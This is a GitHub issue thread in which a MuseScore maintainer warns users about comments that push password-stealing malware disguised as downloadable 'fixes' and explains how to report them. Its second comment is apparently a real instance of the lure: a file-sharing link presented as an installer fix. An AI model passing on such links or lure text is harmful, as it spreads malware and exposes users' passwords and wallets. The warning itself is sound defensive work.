### ISSUE TITLE
CAUTION: watch out for comments spreading malware, don't click suspicious links to "fixes"

### ISSUE THREAD

**Issue by cbjeukendrup** [musescore/MuseScore#24448]
### What's happening?

Since recently, people are abusing GitHub to spread malware. Our repository is not spared.

Accounts of (most likely) innocent users are being abused to post malicious replies to issues, with texts like "try this fix". These comments encourage you to download a mysterious zip file (or similar) from a dubious file sharing site. When you run the executable that is in this zip file, your computer is affected with malware. 

You can read more about this for example here: https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-password-stealing-malware-masked-as-fixes/
That page also contains some examples of such malicious comments.

Quoting that page:
> While GitHub Staff has been deleting these comments as they are detected, people have already [reported falling for the attack](https://www.reddit.com/r/Malware/comments/1f2n1h4/comment/lkbi5gi/).
> 
> Anyone who mistakenly launched the malware should change the passwords at all of their accounts using a unique password for each site and migrate cryptocurrency to a new wallet.

### What can be done about this?

Much to our frustration, we cannot do a lot about this other than manually deleting the comments; it can only be fully stopped by GitHub. We have tried to set up a bot that automatically detects and deletes these comments and warns users not to click the link; but unsurprisingly, the attackers keep adjusting the text of their comments, to the point that they are almost not algorithmically distinguishable anymore from legitimate comments.

That's why we are falling back to putting out this warning message.

### What should I do when I receive such comment?

Step 1: **do nothing, especially don't click the link!** 
Step 2: report the comment to GitHub, by clicking the '...' button on the comment and choosing "Report content":
<img width="238" alt="Scherm­afbeelding 2024-09-04 om 15 26 35" src="https://github.com/user-attachments/assets/e26e8f48-fa51-49a9-9414-d46e358de417">

### When in doubt

Not all comments that ask you to download something are bad; for example, this one comes from our internal team: https://github.com/musescore/MuseScore/issues/24269#issuecomment-2326787723
You can distinguish team members by the "member" tag in the header of their comments:
<img width="193" alt="Scherm­afbeelding 2024-09-04 om 15 30 16" src="https://github.com/user-attachments/assets/c0fcc270-6a4f-491d-8b21-4572e1c0f070">
When in doubt, feel free to ping one of us, for example @cbjeukendrup.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by cbjeukendrup** [comment]
LOL
